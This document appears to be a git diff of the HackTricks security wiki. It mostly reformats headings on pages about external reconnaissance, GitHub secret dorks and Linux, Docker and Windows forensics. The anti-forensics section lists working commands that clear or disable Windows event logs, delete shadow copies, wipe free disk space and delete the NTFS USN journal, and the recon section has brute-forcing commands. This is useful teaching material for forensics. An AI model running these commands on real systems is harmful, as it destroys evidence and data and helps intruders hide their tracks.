You could also find subdomains scrapping the web pages and parsing them (including JS files) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
-### **RapidDNS**
+## **RapidDNS**
Quickly find subdomains using [RapidDNS](https://rapiddns.io) API (from [link](https://twitter.com/Verry\_\_D/status/1282293265597779968)):
@@ -215,7 +215,7 @@ curl -s "https://rapiddns.io/subdomain/$1?full=1" \
}
```
-### **Shodan**
+## **Shodan**
You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
@@ -226,7 +226,7 @@ It is possible to use Shodan from the official CLI to quickly analyze all IPs in
* https://book.hacktricks.xyz/external-recon-methodology
-### **DNS Brute force**
+## **DNS Brute force**
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.\
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors (you should always check for **false positives**) and the second one **is more reliable** (always use gobuster).
@@ -255,7 +255,7 @@ puredns bruteforce all.txt domain.com
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning (DNS poisoning for example) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
-### **VHosts / Virtual Hosts**
+## **VHosts / Virtual Hosts**
You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
@@ -279,7 +279,7 @@ VHostScan -t example.com
With this technique you may even be able to access internal/hidden endpoints.
{% endhint %}
-### **CORS Brute Force**
+## **CORS Brute Force**
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
@@ -287,20 +287,20 @@ Sometimes you will find pages that only return the header _**Access-Control-Allo
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
```
-### **DNS Brute Force v2**
+## **DNS Brute Force v2**
Once you have finished looking for subdomains you can use [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**,** [**altdns**](https://github.com/infosec-au/altdns) and [**gotator**](https://github.com/Josue87/gotator) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains.
-### **Buckets Brute Force**
+## **Buckets Brute Force**
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../pentesting/pentesting-web/buckets/)**.**\
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../pentesting/pentesting-web/buckets/).
-### **Monitorization**
+## **Monitorization**
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
-### **Looking for vulnerabilities**
+## **Looking for vulnerabilities**
Check for possible [**subdomain takeovers**](../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../pentesting/pentesting-web/buckets/).
@@ -308,7 +308,7 @@ If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
-## Web servers hunting
+# Web servers hunting
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
@@ -324,17 +324,17 @@ cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 an
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
```
-### **Screenshots**
+## **Screenshots**
Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), \[shutter]\([**https://shutter-project.org/downloads/**](https://shutter-project.org/downloads/)) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
-### Cloud Assets
+## Cloud Assets
Just with some **specific keywords** identifying the company it's possible to enumerate possible cloud assets belonging to them with tools like [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) **or** [**cloudlist**](https://github.com/projectdiscovery/cloudlist)**.**
-## Recapitulation 1
+# Recapitulation 1
> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done (will see more tricks later).\
> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that.
@@ -349,7 +349,7 @@ So you have already:
Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** (you can see a [guide for that here](../pentesting/pentesting-network/)), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open (this book already contains tons of information about possible vulnerabilities on a lot of common services). **But, don't forget that if the scope allows it, you should give it a try.**
-### Github leaked secrets
+## Github leaked secrets
{% content-ref url="github-leaked-secrets.md" %}
[github-leaked-secrets.md](github-leaked-secrets.md)
@@ -357,11 +357,11 @@ Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not goin
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth\_key)
-### [**Pentesting Web Methodology**](../pentesting/pentesting-web/)
+## [**Pentesting Web Methodology**](../pentesting/pentesting-web/)
Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../pentesting/pentesting-web/).
-## Recapitulation 2
+# Recapitulation 2
> Congratulations! The testing has finished! I hope you have find some vulnerabilities.
@@ -370,7 +370,7 @@ As you can see there is a lot of different vulnerabilities to search for.
**If you have find any vulnerability thanks to this book, please reference the book in your write-up.**
-### **Automatic Tools**
+## **Automatic Tools**
There are several tools out there that will perform part of the proposed actions against a given scope.
@@ -379,7 +379,7 @@ There are several tools out there that will perform part of the proposed actions
* [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw)
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated
-## **References**
+# **References**
* **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)**
diff --git a/external-recon-methodology/github-leaked-secrets.md b/external-recon-methodology/github-leaked-secrets.md
index f51514f7..3f418559 100644
--- a/external-recon-methodology/github-leaked-secrets.md
+++ b/external-recon-methodology/github-leaked-secrets.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Github Leaked Secrets
-
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
-### Api keys leaks in github
+## Api keys leaks in github
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
@@ -33,7 +31,7 @@ Now that we have built the list of assets of our scope it's time to search for s
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
-### **Dorks**
+## **Dorks**
```bash
".mlab.com password"
diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md
index b9a3c217..ff71273b 100644
--- a/forensics/basic-forensic-methodology/README.md
+++ b/forensics/basic-forensic-methodology/README.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Basic Forensic Methodology
-
{% hint style="danger" %}
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
@@ -34,13 +32,13 @@ We are going to talk about partitions, file-systems, carving, memory, logs, back
So if you are doing a professional forensic analysis to some data or just playing a CTF you can find here useful interesting tricks.
-## Creating and Mounting an Image
+# Creating and Mounting an Image
{% content-ref url="image-adquisition-and-mount.md" %}
[image-adquisition-and-mount.md](image-adquisition-and-mount.md)
{% endcontent-ref %}
-## Malware Analysis
+# Malware Analysis
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
@@ -48,7 +46,7 @@ This **isn't necessary the first step to perform once you have the image**. But
[malware-analysis.md](malware-analysis.md)
{% endcontent-ref %}
-## Inspecting an Image
+# Inspecting an Image
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
@@ -70,7 +68,7 @@ Depending on the used OSs and even platform different interesting artifacts shou
[docker-forensics.md](docker-forensics.md)
{% endcontent-ref %}
-## Deep inspection of specific file-types and Software
+# Deep inspection of specific file-types and Software
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
Read the following page to learn some interesting tricks:
@@ -85,19 +83,19 @@ I want to do a special mention to the page:
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
{% endcontent-ref %}
-## Memory Dump Inspection
+# Memory Dump Inspection
{% content-ref url="memory-dump-analysis/" %}
[memory-dump-analysis](memory-dump-analysis/)
{% endcontent-ref %}
-## Pcap Inspection
+# Pcap Inspection
{% content-ref url="pcap-inspection/" %}
[pcap-inspection](pcap-inspection/)
{% endcontent-ref %}
-## **Anti-Forensic Techniques**
+# **Anti-Forensic Techniques**
Keep in mind the possible use of anti-forensic techniques:
@@ -105,7 +103,7 @@ Keep in mind the possible use of anti-forensic techniques:
[anti-forensic-techniques.md](anti-forensic-techniques.md)
{% endcontent-ref %}
-## Threat Hunting
+# Threat Hunting
{% content-ref url="file-integrity-monitoring.md" %}
[file-integrity-monitoring.md](file-integrity-monitoring.md)
diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
index 1f168e76..8f1e02f5 100644
--- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Anti-Forensic Techniques
-
-## Timestamps
+# Timestamps
An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`.
@@ -28,11 +26,11 @@ Both attributes have 4 timestamps: **Modification**, **access**, **creation**, a
**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.
-### TimeStomp - Anti-forensic Tool
+## TimeStomp - Anti-forensic Tool
This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.
-### Usnjrnl
+## Usnjrnl
The **USN Journal** (Update Sequence Number Journal), or Change Journal, is a feature of the Windows NT file system (NTFS) which **maintains a record of changes made to the volume**.\
It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) to search for modifications of this record.
@@ -41,7 +39,7 @@ It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJ
The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
-### $LogFile
+## $LogFile
All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging).\
The logged metadata is stored in a file called “**$LogFile**”, which is found in a root directory of an NTFS file system.\
@@ -60,19 +58,19 @@ Using the same tool it's possible to identify to **which time the timestamps wer
* MTIME: File's MFT registry modifiction
* RTIME: File's access time
-### `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
+## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
Another way to identify suspicions modified files would be to compare the time on both attributes looking for **mismatches**.
-### Nanoseconds
+## Nanoseconds
**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
-### SetMace - Anti-forensic Tool
+## SetMace - Anti-forensic Tool
This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME` . However, from Windows Vista it's necessary a live OS to modify this information.
-## Data Hiding
+# Data Hiding
NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the files is deleted. Then, it's possible to **hide data in this slack space**.
@@ -82,24 +80,24 @@ There are tools like slacker that allows to hide data in this "hidden" space. Ho
Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this can of tools can save the content obfuscated or even encrypted.
-## UsbKill
+# UsbKill
This is a tool that will **turn off the computer is any change in the USB** ports is detected.\
A way to discover this would be to inspect the running processes and **review each python script running**.
-## Live Linux Distributions
+# Live Linux Distributions
These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
-## Secure Deletion
+# Secure Deletion
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
-## Windows Configuration
+# Windows Configuration
It's possible to disable several windows logging methods to make the forensics investigation much harder.
-### Disable Timestamps - UserAssist
+## Disable Timestamps - UserAssist
This is a registry key that maintains dates and hours when each executable was run by the user.
@@ -108,7 +106,7 @@ Disabling UserAssist requires two steps:
1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`.
-### Disable Timestamps - Prefetch
+## Disable Timestamps - Prefetch
This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.
@@ -118,7 +116,7 @@ This will save information about the applications executed with the goal of impr
* Select Modify on each of these to change the value from 1 (or 3) to 0
* Restart
-### Disable Timestamps - Last Access Time
+## Disable Timestamps - Last Access Time
Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.
@@ -127,14 +125,14 @@ Whenever a folder is opened from an NTFS volume on a Windows NT server, the syst
3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process.
4. Close the Registry Editor, and reboot the server.
-### Delete USB History
+## Delete USB History
All the **USB Device Entries** are stored in Windows Registry Under **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device in your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).
Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
-### Disable Shadow Copies
+## Disable Shadow Copies
**List** shadow copies with `vssadmin list shadowstorage`\
**Delete** them running `vssadmin delete shadow`
@@ -151,24 +149,24 @@ To disable shadow copies:
It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
-### Overwrite deleted files
+## Overwrite deleted files
* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
* You can also use tools like [**Eraser**](https://eraser.heidi.ie)
-### Delete Windows event logs
+## Delete Windows event logs
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
-### Disable Windows event logs
+## Disable Windows event logs
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
* Inside the services section disable the service "Windows Event Log"
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
-### Disable $UsnJrnl
+## Disable $UsnJrnl
* `fsutil usn deletejournal /d c:`
diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md
index f6a069a6..ef991315 100644
--- a/forensics/basic-forensic-methodology/docker-forensics.md
+++ b/forensics/basic-forensic-methodology/docker-forensics.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Docker Forensics
-
-## Container modification
+# Container modification
There are suspicions that some docker container was compromised:
@@ -66,7 +64,7 @@ If you find that **some suspicious file was added** you can access the container
docker exec -it wordpress bash
```
-## Images modifications
+# Images modifications
When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
@@ -83,7 +81,7 @@ Then, you can **decompress** the image and **access the blobs** to search for su
tar -xf image.tar
```
-### Basic Analysis
+## Basic Analysis
You can get **basic information** from the image running:
@@ -104,7 +102,7 @@ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpi
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
-### Dive
+## Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
@@ -127,7 +125,7 @@ tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
-## Credentials from memory
+# Credentials from memory
Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md
index ffa2cfdb..51e2d5d2 100644
--- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md
+++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md
@@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Baseline Monitoring
-
-## Baseline
+# Baseline
A baseline consist on take a snapshot of certain part of a system in oder to c**ompare it with a future status to highlight changes**.
For example, you can calculate and store the hash of each file of the filesystem to .be able to find out which files were modified.\
This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
-### File Integrity Monitoring
+## File Integrity Monitoring
File integrity monitoring is one of the most powerful techniques used to secure IT infrastructures and business data against a wide variety of both known and unknown threats.\
The goal is to generate a **baseline of all the files** that you want monitor and then **periodically** **check** those files for possible **changes** (in the content, attribute, metadata...).
@@ -35,12 +33,12 @@ The goal is to generate a **baseline of all the files** that you want monitor an
2\. **Real-time change notification**, which is typically implemented within or as an extension to the kernel of the operating system that will flag when a file is accessed or modified.
-### Tools
+## Tools
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
-## References
+# References
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
diff --git a/forensics/basic-forensic-methodology/image-adquisition-and-mount.md b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
index f3fc051d..66ec7bb3 100644
--- a/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
+++ b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
@@ -17,18 +17,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Image Adquisition & Mount
+# Acquisition
-## Acquisition
-
-### DD
+## DD
```bash
#This will generate a raw copy of the disk
dd if=/dev/sdb of=disk.img
```
-### dcfldd
+## dcfldd
```bash
#Raw copy with hashes along the way (more secur s it checks hashes while it's copying the data)
@@ -36,7 +34,7 @@ dcfldd if= of= bs=512 hash= hashwindow=
-# Linux Forensics
+# Initial Information Gathering
-## Initial Information Gathering
-
-### Basic Information
+## Basic Information
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
@@ -50,7 +48,7 @@ cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
```
-#### Suspicious information
+### Suspicious information
While obtaining the basic information you should check for weird things like:
@@ -58,7 +56,7 @@ While obtaining the basic information you should check for weird things like:
* Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell
-### Memory Dump
+## Memory Dump
In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
In order to **compile** it you need to use the **exact same kernel** the victim machine is using.
@@ -83,14 +81,14 @@ LiME supports 3 **formats**:
LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
-### Disk Imaging
+## Disk Imaging
-#### Shutting down
+### Shutting down
First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
-#### Taking an image of the disk
+### Taking an image of the disk
It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information.
@@ -103,7 +101,7 @@ dcfldd if= of= bs=512 hash= hashwindow=)
-## Inspect AutoStart locations
+# Inspect AutoStart locations
-### Scheduled Tasks
+## Scheduled Tasks
```bash
cat /var/spool/cron/crontabs/* \
@@ -237,7 +235,7 @@ cat /var/spool/cron/crontabs/* \
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
-### Services
+## Services
It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries.
@@ -250,11 +248,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser
* _**/etc/systemd/system**_
* _**/etc/systemd/system/multi-user.target.wants/**_
-### Kernel Modules
+## Kernel Modules
On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware.
-### Other AutoStart Locations
+## Other AutoStart Locations
There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware.
@@ -262,11 +260,11 @@ There are several configuration files that Linux uses to automatically launch an
* _**∼/.bashrc**_ , _**∼/.bash\_profile**_ , _**\~/.profile**_ , _**∼/.config/autostart**_ are executed when the specific user logs in.
* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
-## Examine Logs
+# Examine Logs
Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service.
-### Pure Logs
+## Pure Logs
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
Interesting system logons:
@@ -293,7 +291,7 @@ Interesting system logons:
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
{% endhint %}
-### Command History
+## Command History
Many Linux systems are configured to maintain a command history for each user account:
@@ -302,7 +300,7 @@ Many Linux systems are configured to maintain a command history for each user ac
* \~/.sh\_history
* \~/.\*\_history
-### Logins
+## Logins
Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\
It's recommended to check if those logins make sense:
@@ -314,7 +312,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/
Note that you can also **take a look to this information reading the logs**.
-### Application Traces
+## Application Traces
* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**∼/.ssh/authorized\_keys**_ and _**∼/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts.
* **Gnome Desktop**: User accounts may have a _**∼/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop.
@@ -323,20 +321,20 @@ Note that you can also **take a look to this information reading the logs**.
* **MySQL**: User accounts may have a _**∼/.mysql\_history**_ file that contains queries executed using MySQL.
* **Less**: User accounts may have a _**∼/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less
-### USB Logs
+## USB Logs
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list).
-### Installation
+## Installation
```
pip3 install usbrip
usbrip ids download #Downloal USB ID database
```
-### Examples
+## Examples
```
usbrip events history #Get USB history of your curent linux machine
@@ -348,13 +346,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
-## Review User Accounts and Logon Activities
+# Review User Accounts and Logon Activities
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
Finally look for accounts with **no passwords** or **easily guessed** passwords.
-## Examine File System
+# Examine File System
File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\
**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
@@ -377,27 +375,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
{% endhint %}
-## Compare files of different filesystem versions
+# Compare files of different filesystem versions
-#### Find added files
+### Find added files
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```
-#### Find Modified content
+### Find Modified content
```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
```
-#### Find deleted files
+### Find deleted files
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
```
-#### Other filters
+### Other filters
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…[*]]`**
@@ -407,7 +405,7 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil
Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled.
-## References
+# References
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
